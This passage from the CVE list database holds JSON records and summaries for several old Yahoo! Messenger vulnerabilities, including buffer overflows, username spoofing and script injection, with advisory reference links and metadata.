              "lang": "eng",
              "value": "Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "yahoo-messenger-username-spoof(8267)",
              "refsource": "XF",
              "url": "http://www.iss.net/security_center/static/8267.php"
            },
            {
              "name": "CA-2002-16",
              "refsource": "CERT",
              "url": "http://www.cert.org/advisories/CA-2002-16.html"
            },
            {
              "name": "20020221 Remote crashes in Yahoo messenger",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
            },
            {
              "name": "VU#952875",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/952875"
            },
            {
              "name": "4164",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/4164"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-0321",
    "datePublished": "2002-05-03T04:00:00",
    "dateReserved": "2002-05-01T00:00:00",
    "dateUpdated": "2024-08-08T02:42:29.169Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-3148 (GCVE-0-2007-3148)
Vulnerability from cvelistv5
Published
2007-06-11 18:00
Modified
2024-08-07 14:05
Severity ?
CWE
  • n/a
Summary
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:05:29.296Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "4043",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/4043"
          },
          {
            "name": "yahoo-webcam-viewer-bo(34759)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
          },
          {
            "name": "37081",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/37081"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
          },
          {
            "name": "24355",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24355"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://messenger.yahoo.com/security_update.php?id=060707"
          },
          {
            "name": "ADV-2007-2094",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/2094"
          },
          {
            "name": "25547",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25547"
          },
          {
            "name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
          },
          {
            "name": "1018204",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1018204"
          },
          {
            "name": "20070607 2nd Yahoo 0day ActiveX Exploit",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
          },
          {
            "name": "24341",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24341"
          },
          {
            "name": "1018203",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018203"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
          },
          {
            "name": "VU#932217",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/932217"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-06-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "4043",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/4043"
        },
        {
          "name": "yahoo-webcam-viewer-bo(34759)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
        },
        {
          "name": "37081",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/37081"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
        },
        {
          "name": "24355",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24355"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://messenger.yahoo.com/security_update.php?id=060707"
        },
        {
          "name": "ADV-2007-2094",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/2094"
        },
        {
          "name": "25547",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25547"
        },
        {
          "name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
        },
        {
          "name": "1018204",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1018204"
        },
        {
          "name": "20070607 2nd Yahoo 0day ActiveX Exploit",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
        },
        {
          "name": "24341",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24341"
        },
        {
          "name": "1018203",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018203"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
        },
        {
          "name": "VU#932217",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/932217"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-3148",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "4043",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/4043"
            },
            {
              "name": "yahoo-webcam-viewer-bo(34759)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
            },
            {
              "name": "37081",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/37081"
            },
            {
              "name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
              "refsource": "MISC",
              "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
            },
            {
              "name": "24355",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24355"
            },
            {
              "name": "http://messenger.yahoo.com/security_update.php?id=060707",
              "refsource": "CONFIRM",
              "url": "http://messenger.yahoo.com/security_update.php?id=060707"
            },
            {
              "name": "ADV-2007-2094",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/2094"
            },
            {
              "name": "25547",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25547"
            },
            {
              "name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
            },
            {
              "name": "1018204",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1018204"
            },
            {
              "name": "20070607 2nd Yahoo 0day ActiveX Exploit",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
            },
            {
              "name": "24341",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24341"
            },
            {
              "name": "1018203",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018203"
            },
            {
              "name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
              "refsource": "MISC",
              "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
            },
            {
              "name": "VU#932217",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/932217"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-3148",
    "datePublished": "2007-06-11T18:00:00",
    "dateReserved": "2007-06-11T00:00:00",
    "dateUpdated": "2024-08-07T14:05:29.296Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-3928 (GCVE-0-2007-3928)
Vulnerability from cvelistv5
Published
2007-07-21 00:00
Modified
2024-08-07 14:37
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638.
References
http://secunia.com/advisories/26066 (third-party-advisory, x_refsource_SECUNIA)
http://www.xdisclose.com/advisory/XD100002.html (x_refsource_MISC)
http://www.securityfocus.com/bid/24926 (vdb-entry, x_refsource_BID)
http://www.securitytracker.com/id?1018398 (vdb-entry, x_refsource_SECTRACK)
http://securityreason.com/securityalert/2906 (third-party-advisory, x_refsource_SREASON)
https://exchange.xforce.ibmcloud.com/vulnerabilities/35434 (vdb-entry, x_refsource_XF)
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html (mailing-list, x_refsource_FULLDISC)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:37:04.515Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "26066",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/26066"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.xdisclose.com/advisory/XD100002.html"
          },
          {
            "name": "24926",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24926"
          },
          {
            "name": "1018398",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018398"
          },
          {
            "name": "2906",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2906"
          },
          {
            "name": "yahoo-messenger-address-book-bo(35434)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
          },
          {
            "name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-07-16T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry.  NOTE: this might overlap CVE-2007-3638."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "26066",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/26066"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.xdisclose.com/advisory/XD100002.html"
        },
        {
          "name": "24926",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24926"
        },
        {
          "name": "1018398",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018398"
        },
        {
          "name": "2906",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2906"
        },
        {
          "name": "yahoo-messenger-address-book-bo(35434)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
        },
        {
          "name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-3928",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry.  NOTE: this might overlap CVE-2007-3638."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "26066",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/26066"
            },
            {
              "name": "http://www.xdisclose.com/advisory/XD100002.html",
              "refsource": "MISC",
              "url": "http://www.xdisclose.com/advisory/XD100002.html"
            },
            {
              "name": "24926",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24926"
            },
            {
              "name": "1018398",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018398"
            },
            {
              "name": "2906",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2906"
            },
            {
              "name": "yahoo-messenger-address-book-bo(35434)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
            },
            {
              "name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-3928",
    "datePublished": "2007-07-21T00:00:00",
    "dateReserved": "2007-07-20T00:00:00",
    "dateUpdated": "2024-08-07T14:37:04.515Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-0032 (GCVE-0-2002-0032)
Vulnerability from cvelistv5
Published
2003-04-02 05:00
Modified
2024-08-08 02:35
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI.
References
http://www.cert.org/advisories/CA-2002-16.html (third-party-advisory, x_refsource_CERT)
http://online.securityfocus.com/archive/1/274223 (mailing-list, x_refsource_BUGTRAQ)
http://www.securityfocus.com/bid/4838 (vdb-entry, x_refsource_BID)
http://www.kb.cert.org/vuls/id/172315 (third-party-advisory, x_refsource_CERT-VN)
http://www.iss.net/security_center/static/9184.php (vdb-entry, x_refsource_XF)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:35:17.488Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "CA-2002-16",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.cert.org/advisories/CA-2002-16.html"
          },
          {
            "name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://online.securityfocus.com/archive/1/274223"
          },
          {
            "name": "4838",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/4838"
          },
          {
            "name": "VU#172315",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/172315"
          },
          {
            "name": "yahoo-messenger-script-injection(9184)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "http://www.iss.net/security_center/static/9184.php"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-05-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2003-03-19T00:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "CA-2002-16",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.cert.org/advisories/CA-2002-16.html"
        },
        {
          "name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://online.securityfocus.com/archive/1/274223"
        },
        {
          "name": "4838",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/4838"
        },
        {
          "name": "VU#172315",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/172315"
        },
        {
          "name": "yahoo-messenger-script-injection(9184)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "http://www.iss.net/security_center/static/9184.php"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-0032",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "CA-2002-16",
              "refsource": "CERT",
              "url": "http://www.cert.org/advisories/CA-2002-16.html"
            },
            {
              "name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
              "refsource": "BUGTRAQ",
              "url": "http://online.securityfocus.com/archive/1/274223"
            },
            {
              "name": "4838",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/4838"
            },
            {
              "name": "VU#172315",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/172315"
            },
            {
              "name": "yahoo-messenger-script-injection(9184)",
              "refsource": "XF",
              "url": "http://www.iss.net/security_center/static/9184.php"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-0032",
    "datePublished": "2003-04-02T05:00:00",
    "dateReserved": "2002-01-16T00:00:00",
    "dateUpdated": "2024-08-08T02:35:17.488Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-0320 (GCVE-0-2002-0320)
Vulnerability from cvelistv5
Published
2002-05-03 04:00
Modified
2024-08-08 02:42
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field.
References
http://www.securityfocus.com/bid/4162 (vdb-entry, x_refsource_BID)
http://www.kb.cert.org/vuls/id/887319 (third-party-advisory, x_refsource_CERT-VN)
http://www.cert.org/advisories/CA-2002-16.html (third-party-advisory, x_refsource_CERT)
http://marc.info/?l=bugtraq&m=101439616623230&w=2 (mailing-list, x_refsource_BUGTRAQ)
http://www.kb.cert.org/vuls/id/419419 (third-party-advisory, x_refsource_CERT-VN)
http://www.iss.net/security_center/static/8265.php (vdb-entry, x_refsource_XF)
http://www.iss.net/security_center/static/8264.php (vdb-entry, x_refsource_XF)
http://www.securityfocus.com/bid/4163 (vdb-entry, x_refsource_BID)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:42:29.167Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "4162",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/4162"
          },
          {
            "name": "VU#887319",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/887319"
          },
          {
            "name": "CA-2002-16",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.cert.org/advisories/CA-2002-16.html"
          },
          {
            "name": "20020221 Remote crashes in Yahoo messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
          },
          {
            "name": "VU#419419",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/419419"
          },
          {
            "name": "yahoo-messenger-imvironment-bo(8265)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "http://www.iss.net/security_center/static/8265.php"
          },
          {
            "name": "yahoo-messenger-message-bo(8264)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "http://www.iss.net/security_center/static/8264.php"
          },
          {
            "name": "4163",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/4163"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "4162",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/4162"
        },
        {
          "name": "VU#887319",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/887319"
        },
        {
          "name": "CA-2002-16",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.cert.org/advisories/CA-2002-16.html"
        },
        {
          "name": "20020221 Remote crashes in Yahoo messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
        },
        {
          "name": "VU#419419",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/419419"
        },
        {
          "name": "yahoo-messenger-imvironment-bo(8265)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "http://www.iss.net/security_center/static/8265.php"
        },
        {
          "name": "yahoo-messenger-message-bo(8264)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "http://www.iss.net/security_center/static/8264.php"
        },
        {
          "name": "4163",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/4163"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-0320",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "4162",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/4162"
            },
            {
              "name": "VU#887319",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/887319"
            },
            {
              "name": "CA-2002-16",
              "refsource": "CERT",
              "url": "http://www.cert.org/advisories/CA-2002-16.html"
            },
            {
